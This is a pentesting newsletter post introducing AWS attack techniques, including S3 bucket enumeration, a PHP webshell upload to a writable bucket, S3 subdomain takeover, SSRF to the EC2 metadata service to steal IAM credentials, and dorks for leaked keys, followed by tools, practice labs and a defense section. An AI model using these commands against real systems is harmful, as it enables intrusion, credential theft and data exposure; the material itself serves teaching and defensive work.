AWS for Pentesters: Your First Steps into Cloud Hacking

18 min read

December 14, 2025

🚧 Site Migration Notice

I've recently migrated this site from Ghost CMS to a new Astro-based frontend. While I've worked hard to ensure everything transferred correctly, some articles may contain formatting errors or broken elements.

If you spot any issues, I'd really appreciate it if you could let me know! Your feedback helps improve the site for everyone.

AWS for Pentesters: Your First Steps into Cloud Hacking

Table of contents

Contents

👋 Introduction

Hey everyone!

I’ll be honest. I’m writing this newsletter because I need to learn AWS myself.

I’m currently working on a project that involves cloud infrastructure, and I can’t keep avoiding AWS anymore. For the longest time, I stayed in my comfort zone (web apps, APIs, smart contracts) but cloud security? That felt like a different world. IAM, EC2, S3, VPC, KMS, Lambda… it’s overwhelming when you’re starting from zero.

But here’s the thing: I can’t audit what I don’t understand. And judging by the number of cloud breaches I keep reading about (Capital One, Uber, countless exposed S3 buckets), this knowledge is essential for modern pentesting.

So I’m taking the approach I always do when learning something new: I document it and share it. This newsletter is as much for me as it is for you. I’m breaking down AWS security from the perspective of someone who’s never touched it before, because that’s exactly where I am.

What I’ve learned so far is encouraging: you don’t need to be a cloud architect to find cloud vulnerabilities. Most AWS security issues aren’t about complex IAM policies or sophisticated privilege escalation chains. They’re misconfigurations. Public S3 buckets. Exposed metadata services. Overly permissive policies. The kind of stuff you can find with basic reconnaissance and a few simple commands.

The barrier to entry is low. You don’t need an AWS account to test many attack vectors. And the free tier is enough to set up your own vulnerable environments for practice.

If you’re in the same boat (comfortable with traditional pentesting but intimidated by cloud) this is your starting point. Let’s learn this together.

In this issue, I’ll cover:

  • AWS basics for pentesters (regions, services, IAM fundamentals)
  • S3 bucket enumeration and exploitation (the most common cloud vulnerability)
  • SSRF to AWS metadata service (stealing credentials from EC2 instances)
  • Basic AWS reconnaissance (finding cloud resources from external perspective)
  • Tools and techniques for cloud security testing
  • Hands-on labs to practice these skills

If you’ve never touched AWS but want to start finding cloud vulnerabilities, this is your starting point. No prior cloud experience required.

Let’s get started 👇

☁️ AWS 101: What Pentesters Need to Know

Before breaking things, let’s understand what you’re dealing with.

What is AWS?

Amazon Web Services (AWS) is a cloud computing platform. Instead of companies running their own servers, they rent virtual machines, storage, and services from Amazon’s data centers.

Think of it like this:

  • Traditional infrastructure: Company buys servers, racks them, manages networking, storage, backups, etc.
  • Cloud infrastructure: Company clicks a button, AWS provisions a server in seconds, company pays by the hour

For pentesters, this means:

  • Target infrastructure is dynamic: Servers spin up and down constantly
  • Misconfigurations are common: Developers often prioritize speed over security
  • Attack surface is public: Many services have public endpoints by default

Key AWS Services (Security Perspective)

You don’t need to memorize all 200+ AWS services. Focus on these:

S3 (Simple Storage Service): Object storage. Think Dropbox for developers. Files are stored in “buckets” that can be public or private. Most common misconfiguration in AWS.

EC2 (Elastic Compute Cloud): Virtual machines. Servers running in AWS. Can be Linux or Windows.

IAM (Identity and Access Management): Controls who can do what in AWS. Users, roles, policies. Critical for understanding privilege escalation.

Lambda: Serverless functions. Code that runs without a dedicated server. Can have overly permissive permissions.

RDS (Relational Database Service): Managed databases (MySQL, PostgreSQL, etc.). Sometimes publicly accessible.

CloudFront: Content Delivery Network (CDN). Can lead to subdomain takeovers.

Route 53: DNS service. Useful for reconnaissance.

AWS Regions and Availability Zones

AWS is organized geographically:

  • Region: A physical location with multiple data centers (e.g., us-east-1 = Northern Virginia, eu-west-1 = Ireland)
  • Availability Zone (AZ): Individual data centers within a region

Why this matters for pentesters:

  • Resources in different regions are isolated
  • S3 bucket names are global, but buckets themselves are region-specific
  • When enumerating, you might need to check multiple regions

Common regions:

  • us-east-1: US East (N. Virginia) - Most common, default for many services
  • us-west-2: US West (Oregon)
  • eu-west-1: Europe (Ireland)
  • ap-southeast-1: Asia Pacific (Singapore)

IAM: The Backbone of AWS Security

IAM controls access in AWS. Understanding IAM is essential for cloud pentesting.

IAM Components:

Users: Individual accounts (e.g., john@company.com)

Groups: Collections of users with shared permissions

Roles: Identity that AWS resources can assume (e.g., EC2 instance role)

Policies: JSON documents that define permissions

Example IAM Policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::my-bucket/*"
    }
  ]
}

This policy allows reading objects from the bucket my-bucket.

Key IAM Concepts:

  • ARN (Amazon Resource Name): Unique identifier for AWS resources

    • Format: arn:aws:service:region:account-id:resource
    • Example: arn:aws:s3:::my-bucket
  • Principal: Entity making the request (user, role, service)

  • Permissions boundary: Maximum permissions a user can have

From an attacker perspective:

  • Misconfigured IAM policies can grant excessive permissions
  • Roles with overly broad permissions are gold
  • Credential leaks (access keys) are common

AWS Access Credentials

There are two types of credentials:

1. Root Account Credentials:

  • Email and password for the AWS account
  • Full access to everything
  • Should never be used for day-to-day operations (but often is)

2. IAM Access Keys:

  • Programmatic access credentials
  • Consist of:
    • Access Key ID: Like a username (e.g., AKIAIOSFODNN7EXAMPLE)
    • Secret Access Key: Like a password (e.g., wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY)

Long-term access keys start with AKIA (IAM users, root account). If you see AKIA in source code, logs, or JavaScript, that’s an AWS access key leak.

Temporary access keys start with ASIA (STS temporary credentials). These also require a session token.

Security Token Service (STS) Temporary Credentials:

  • Temporary credentials with expiration (15 minutes to 12 hours)
  • Access Key ID starts with ASIA (not AKIA)
  • Include: Access Key ID, Secret Access Key, Session Token
  • Session token is required for all API calls
  • Commonly used by EC2 instance roles, Lambda functions, federated users

🪣 S3 Buckets: The Low-Hanging Fruit

S3 is the most common attack vector in AWS. Why? Because it’s easy to misconfigure and the impact is often massive.

What Makes S3 Dangerous?

S3 buckets can be:

  • Public: Anyone on the internet can list and download files
  • Authenticated: Only AWS users can access
  • Private: Only specific IAM users/roles can access

The problem? Developers often make buckets public by accident or “temporarily” and forget to lock them down.

S3 Bucket URL Formats

Buckets can be accessed via multiple URL formats:

Path-style (legacy):

https://s3.amazonaws.com/bucket-name/file.txt
https://s3-region.amazonaws.com/bucket-name/file.txt

Virtual-hosted style (current standard):

https://bucket-name.s3.amazonaws.com/file.txt
https://bucket-name.s3-region.amazonaws.com/file.txt

Website hosting:

http://bucket-name.s3-website-region.amazonaws.com/
http://bucket-name.s3-website.region.amazonaws.com/

Finding S3 Buckets

1. Look for S3 URLs in Target Applications

Check:

  • JavaScript files
  • Image/CSS/font URLs
  • API responses
  • Mobile app decompilation
  • HTML source code

Example finding:

// Found in app.js
const API_URL = "https://company-api-prod.s3.amazonaws.com/config.json";

2. Enumerate Based on Company Name

S3 bucket names are globally unique and often follow patterns:

Common naming patterns:

company-name
company-name-prod
company-name-dev
company-name-staging
company-uploads
company-backups
company-logs
company-assets
company-static
www.company.com
dev.company.com

3. Subdomain Enumeration

Use subdomain enumeration tools and check if subdomains point to S3:

# Using amass
amass enum -d target.com -o subdomains.txt

# Check each subdomain for S3
while read sub; do
  host $sub | grep -i "s3"
done < subdomains.txt

If you see:

dev.company.com is an alias for dev-company.s3.amazonaws.com

That’s an S3 bucket.

Testing S3 Bucket Access

Once you find a bucket name, test if it’s accessible:

Method 1: Browser

Try accessing:

https://bucket-name.s3.amazonaws.com/

If you get an XML listing, it’s public:

<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult>
  <Name>bucket-name</Name>
  <Contents>
    <Key>file1.txt</Key>
    ...
  </Contents>
</ListBucketResult>

If you get AccessDenied, it exists but isn’t publicly listable (might still have public files).

If you get NoSuchBucket, it doesn’t exist.

Method 2: AWS CLI

Install AWS CLI (no credentials needed for public buckets):

# List bucket contents
aws s3 ls s3://bucket-name --no-sign-request

# Download a file
aws s3 cp s3://bucket-name/file.txt ./file.txt --no-sign-request

# Sync entire bucket
aws s3 sync s3://bucket-name ./local-folder --no-sign-request

The --no-sign-request flag attempts anonymous access.

S3 Permissions: Read vs Write

Buckets can have different permission combinations:

Public Read: Can list and download files (most common misconfiguration)

Public Write: Can upload files (rare but critical)

Test write access:

# Try to upload a file
echo "test" > test.txt
aws s3 cp test.txt s3://bucket-name/test.txt --no-sign-request

If successful, you can:

  • Upload webshells to static website buckets
  • Overwrite critical files
  • Inject malicious content

Public Read ACL: Can read the bucket’s access control list

aws s3api get-bucket-acl --bucket bucket-name --no-sign-request

Real-World S3 Exploitation Examples

Scenario 1: Public Backup Bucket

aws s3 ls s3://company-backups --no-sign-request

# Output:
# database-backup-2025-12-01.sql.gz
# application-secrets.env
# id_rsa

You just found database backups, environment variables with API keys, and SSH private keys.

Scenario 2: Public Upload Bucket with Website Hosting

# Check if bucket hosts a static website
curl http://company-uploads.s3-website-us-east-1.amazonaws.com

# Upload a webshell
echo '<?php system($_GET["c"]); ?>' > shell.php
aws s3 cp shell.php s3://company-uploads/shell.php --no-sign-request

# Access it
curl http://company-uploads.s3-website-us-east-1.amazonaws.com/shell.php?c=whoami

Scenario 3: Subdomain Takeover via S3

If a DNS record points to a non-existent S3 bucket, you can create it and take over the subdomain:

dev.company.com CNAME dev-company.s3.amazonaws.com

If dev-company bucket doesn’t exist, create it:

aws s3 mb s3://dev-company --region us-east-1
echo "Subdomain Takeover PoC" > index.html
aws s3 cp index.html s3://dev-company/index.html
aws s3 website s3://dev-company --index-document index.html

Now dev.company.com serves your content.

Impact: Phishing, XSS (if parent domain cookies aren’t properly scoped), reputation damage.

🔍 EC2 Metadata Service: SSRF to Credentials

If you find an SSRF (Server-Side Request Forgery) vulnerability in an application running on AWS EC2, you can steal credentials.

Note: For a comprehensive guide on finding and exploiting SSRF vulnerabilities, check out Issue 4: Inside the Request - From Basic SSRF to Internal Takeover, where I cover SSRF fundamentals, detection techniques, and exploitation methods. This section focuses specifically on exploiting SSRF in AWS environments to access the metadata service.

What is the EC2 Metadata Service?

Every EC2 instance has access to a special internal endpoint that provides metadata about the instance:

http://169.254.169.254/

This endpoint is only accessible from within the EC2 instance. External users can’t reach it directly. But if the application has SSRF, you can.

What’s Available in Metadata?

The metadata service exposes:

  • Instance details (AMI ID, instance type, region)
  • IAM role credentials (if the instance has a role attached)
  • User data (startup scripts, sometimes contains secrets)
  • Network information

Why this matters:

  • If the EC2 instance has an IAM role, you can steal temporary credentials
  • Those credentials grant whatever permissions the role has
  • Common scenario: EC2 role has S3 read/write, database access, Lambda invoke, etc.

Metadata Service Versions

IMDSv1 (Instance Metadata Service Version 1):

  • Simple HTTP GET requests
  • No authentication required
  • Easy to exploit via SSRF

IMDSv2 (Instance Metadata Service Version 2):

  • Requires a session token
  • Token obtained via HTTP PUT with custom header
  • Harder to exploit (but still possible)

Exploiting IMDSv1 via SSRF

Assume you found an SSRF vulnerability where you can control a URL parameter:

https://target.com/api/fetch?url=<YOUR_URL>

Step 1: Confirm Metadata Access

https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/

If you get a response like:

ami-id
hostname
iam/
instance-id
local-ipv4
public-ipv4

You’ve hit the metadata service.

Step 2: Check for IAM Role

https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

If the instance has a role, you’ll see the role name:

web-server-role

Step 3: Retrieve Credentials

https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/web-server-role

Response:

{
  "AccessKeyId": "ASIAXXXXXXXXXXX",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2VjEH...",
  "Expiration": "2025-12-14T12:00:00Z"
}

You now have temporary AWS credentials. Note the ASIA prefix indicating temporary credentials.

Step 4: Use the Credentials

Export them locally:

export AWS_ACCESS_KEY_ID="ASIAXXXXXXXXXXX"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEH..."

Test what permissions you have:

# Check identity
aws sts get-caller-identity

# List S3 buckets
aws s3 ls

# Enumerate permissions (requires additional tools)

Step 5: Enumerate Permissions

Once you have credentials, you need to discover what permissions they have. You can brute-force IAM permissions using enumeration tools (covered in the Tools section below) to systematically test what actions the role can perform.

Exploiting IMDSv2

IMDSv2 requires a token. To get the token, you must:

  1. Send a PUT request to /latest/api/token with header X-aws-ec2-metadata-token-ttl-seconds
  2. Use the returned token in subsequent requests with header X-aws-ec2-metadata-token

Challenge: Most SSRF vulnerabilities only allow GET requests, not PUT.

Workarounds:

  • If SSRF allows custom headers, you can still exploit IMDSv2
  • Some SSRF bypasses allow HTTP verb tampering
  • Look for chained vulnerabilities (SSRF + CRLF injection)

Example with custom headers (if allowed):

PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600

User Data Exposure

EC2 instances can have “user data” scripts that run on startup. These sometimes contain secrets:

http://169.254.169.254/latest/user-data

Response might include:

#!/bin/bash
export DB_PASSWORD="super_secret_password"
export API_KEY="sk_live_XXXXXXX"

🔎 AWS Reconnaissance from External Perspective

You don’t need AWS credentials to enumerate resources. Here’s what you can find from outside.

DNS Enumeration

Find subdomains that point to AWS services:

# Subdomain enumeration
amass enum -d target.com -o subs.txt
subfinder -d target.com -o subs.txt

# Check for AWS services
while read sub; do
  dig $sub | grep -E 's3|cloudfront|elb|ec2'
done < subs.txt

Look for:

  • S3: s3.amazonaws.com, s3-website
  • CloudFront: cloudfront.net
  • ELB (Load Balancer): elb.amazonaws.com, amazonaws.com

Certificate Transparency Logs

Services like crt.sh and Censys index SSL certificates. AWS services often appear here:

curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u

Look for S3 bucket names in certificate SANs.

Shodan and Censys

Search for AWS-related services:

Shodan queries:

org:"Amazon.com" hostname:target.com
"Access Key ID" "Secret Access Key"

Censys queries:

parsed.names:target.com and tags:s3

Developers often commit AWS credentials and bucket names:

GitHub Dorks:

org:target-company "AKIA"
org:target-company "ASIA"
org:target-company "aws_secret_access_key"
org:target-company "s3.amazonaws.com"
filename:.env "AWS"

Use automated secret scanning tools (covered in Tools section) to efficiently scan repositories for leaked credentials.

Network Reconnaissance

Scan for open ports on EC2 instances:

# Find EC2 IP ranges for a region
curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | \
  jq -r '.prefixes[] | select(.region=="us-east-1" and .service=="EC2") | .ip_prefix'

# Scan target IPs
nmap -sV -p 22,80,443,3389,3306,5432,6379,27017 target-ip

Common misconfigurations:

  • Port 22 (SSH) open to 0.0.0.0/0
  • Port 3306 (MySQL) or 5432 (PostgreSQL) publicly accessible
  • Port 6379 (Redis) without authentication

🛠️ Essential Tools for AWS Pentesting

Reconnaissance and Enumeration

ScoutSuite: Multi-cloud security auditing tool

pip install scoutsuite
scout aws --profile <profile-name>

Generates an HTML report with findings across IAM, S3, EC2, RDS, etc.

Prowler: AWS security assessment tool

pip install prowler
prowler aws --compliance cis_2.0

CloudMapper: Visualize AWS environments

git clone https://github.com/duo-labs/cloudmapper
cd cloudmapper
python cloudmapper.py collect --account my-account
python cloudmapper.py prepare --account my-account
python cloudmapper.py webserver

Exploitation and Post-Exploitation

Pacu: AWS exploitation framework (like Metasploit for AWS)

git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
bash install.sh
python pacu.py

Features:

  • Privilege escalation modules
  • Credential harvesting
  • Service enumeration
  • Data exfiltration

WeirdAAL: AWS attack library

git clone https://github.com/carnal0wnage/weirdAAL
cd weirdAAL
python weirdAAL.py -m list_modules

S3 Bucket Enumeration

S3Scanner: Check S3 bucket permissions

pip install s3scanner
s3scanner scan --buckets-file bucket-names.txt

cloud_enum: Multi-cloud OSINT tool

python3 cloud_enum.py -k company-name

bucket-stream: Real-time S3 bucket discovery from certificate transparency logs

slurp: S3 bucket enumerator

slurp domain -t company.com

AWSBucketDump: S3 bucket enumeration and download tool

python AWSBucketDump.py -l bucket-names.txt -g

IAM Permission Enumeration

enumerate-iam: Brute-force IAM permissions

python enumerate-iam.py --access-key ASIAXXX --secret-key wJalr... --session-token IQoJ...

Credential Scanning

GitLeaks: Find secrets in git repos

gitleaks detect --source . --report-path report.json

TruffleHog: High-entropy string scanner

trufflehog git https://github.com/target/repo

GitRob: Find sensitive files in GitHub organizations

AWS CLI Essentials

The AWS CLI is your best friend:

# Install
pip install awscli

# Configure (if you have credentials)
aws configure

# Basic commands
aws sts get-caller-identity  # Who am I?
aws s3 ls                     # List S3 buckets
aws ec2 describe-instances    # List EC2 instances
aws iam list-users            # List IAM users
aws iam get-user              # Get current user details

🧪 Hands-On Labs

Practice safely in controlled environments:

flAWS.cloud

Free AWS security challenges:

  • Level 1: Find S3 bucket contents
  • Level 2: Publicly exposed S3 bucket with credentials
  • Level 3: EC2 metadata service exploitation
  • Level 4-6: Advanced privilege escalation

No AWS account required for early levels.

flAWS2.cloud

Sequel to flAWS with defender and attacker paths.

CloudGoat

Vulnerable-by-design AWS infrastructure:

git clone https://github.com/RhinoSecurityLabs/cloudgoat
cd cloudgoat
pip install -r requirements.txt
python cloudgoat.py config profile
python cloudgoat.py config whitelist --auto
python cloudgoat.py create iam_privesc_by_rollback

Requires your own AWS account (uses free tier resources).

Scenarios include:

  • IAM privilege escalation
  • Lambda function exploitation
  • EC2 SSRF to metadata
  • S3 bucket enumeration

TryHackMe - AWS Security

Search for “AWS” on TryHackMe for guided rooms.

PentesterLab - AWS Badge

Paid platform with structured AWS security exercises.

🔒 Detection and Defense

For Blue Teams

1. Monitor CloudTrail Logs

AWS CloudTrail logs all API calls. Enable it and monitor for:

  • GetObject on sensitive S3 buckets from unknown IPs
  • AssumeRole from unexpected sources
  • Failed authentication attempts
  • Enumeration activities (rapid Describe* calls)

2. Enable S3 Block Public Access

At the account level:

aws s3control put-public-access-block \
  --account-id <account-id> \
  --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true

3. Enforce IMDSv2

Disable IMDSv1 on all EC2 instances:

aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

4. Use AWS IAM Access Analyzer

Automatically identifies resources shared with external entities:

aws accessanalyzer create-analyzer --analyzer-name my-analyzer --type ACCOUNT

5. Implement Least Privilege IAM Policies

Avoid wildcard permissions:

{
  "Effect": "Allow",
  "Action": "*",
  "Resource": "*"
}

Instead, grant specific permissions:

{
  "Effect": "Allow",
  "Action": ["s3:GetObject", "s3:PutObject"],
  "Resource": "arn:aws:s3:::my-bucket/*"
}

6. Enable MFA for IAM Users

Require MFA for console access and sensitive API calls.

7. Rotate Access Keys Regularly

Old, forgotten access keys are a common entry point.

8. Use AWS Config

Monitor resource configuration changes and compliance:

aws configservice put-configuration-recorder \
  --configuration-recorder name=default,roleARN=arn:aws:iam::account:role/config-role

For Developers

Secure S3 Buckets:

  • Never make buckets public unless absolutely necessary
  • Use bucket policies with specific IP restrictions
  • Enable versioning and logging
  • Use pre-signed URLs for temporary access

Protect Against SSRF:

  • Validate and sanitize all URLs
  • Use allowlists, not denylists
  • Block access to metadata service (169.254.169.254)
  • Implement network-level controls

Don’t Hardcode Credentials:

  • Use IAM roles for EC2/Lambda
  • Use AWS Secrets Manager or Parameter Store
  • Never commit credentials to git

🎯 Key Takeaways

  • AWS is not inherently insecure, but misconfigurations are everywhere
  • S3 buckets are the most common AWS vulnerability due to public access misconfigurations
  • SSRF to EC2 metadata service can leak IAM credentials, granting access to other AWS resources
  • You don’t need AWS credentials to enumerate many resources via DNS, certificate transparency, and public APIs
  • Subdomain takeovers via S3 are common when DNS records point to non-existent buckets
  • IMDSv2 makes metadata exploitation harder but not impossible
  • Defense requires proactive monitoring, least privilege IAM, and blocking public access by default
  • CloudTrail, Config, and IAM Access Analyzer are essential for visibility and compliance

📚 Further Reading


That’s it for this week!

If you’ve been avoiding AWS pentesting because it felt overwhelming, I hope this demystifies it. Start simple. Enumerate S3 buckets on your next target. Test for SSRF and try hitting the metadata service. Use the free flAWS.cloud labs to practice.

Cloud security is a massive field, but you don’t need to know everything to find high-impact vulnerabilities. Focus on the basics: S3, IAM, and SSRF. You’ll be surprised how often these simple techniques work.

Thanks for reading, and happy hacking ☁️

— Ruben

Chapters

Rust Security Code Review: When Memory Safety Isn't Enough
Rust Security Code Review: When Memory Safety Isn't Enough

Previous Issue

Enjoyed the article?

Stay Updated & Support

Get the latest offensive security insights, hacking techniques, and cybersecurity content delivered straight to your inbox.

Follow me on social media